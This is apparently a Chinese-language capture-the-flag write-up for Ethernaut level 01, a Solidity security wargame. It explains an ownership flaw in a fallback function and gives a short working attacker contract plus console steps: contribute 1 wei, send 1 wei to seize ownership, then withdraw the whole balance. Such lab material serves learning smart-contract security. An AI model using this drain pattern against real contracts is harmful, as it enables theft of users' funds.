Ethernaut 01
基本思路:涉及敏感操作的权限控制漏洞——首先调用contribute函数发送1wei,然后直接发送1wei,从而绕过程序的逻辑缺陷,最终调用withdraw函数,取回所有币,成功过关
额外补充:本人自行编写的POC合约,在测试网上经过验证可以实现上述逻辑成功进行攻击
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract POC{
address payable public victim;
address public owner;
constructor() payable {
owner = msg.sender;
}
function setVictim(address victim_) public {
victim = payable(victim_);
}
function getBalance() public view returns (uint256){
return address(this).balance;
}
function step1_transfer() public {
(bool success, bytes memory data) = victim.call{value: 1}(abi.encodeWithSignature("contribute()"));
require(success==true , "call Fallback::contribute failed" );
}
function step2_transfer_and_getOwner() public {
(bool success ,)= victim.call{value: 1}("");
require(success==true, "send failed");
}
function step3_attack() public {
(bool success, bytes memory data) = victim.call(abi.encodeWithSignature("withdraw()"));
require(success==true , "call Fallback::withdraw failed" );
}
fallback() external payable {
}
}
网上方法:
步骤1:contract.contribute({value:1})
步骤2:MetaMask直接发送1wei,此时我们已经成功拿到owner
步骤3:contract.withdraw()
本题小结:简单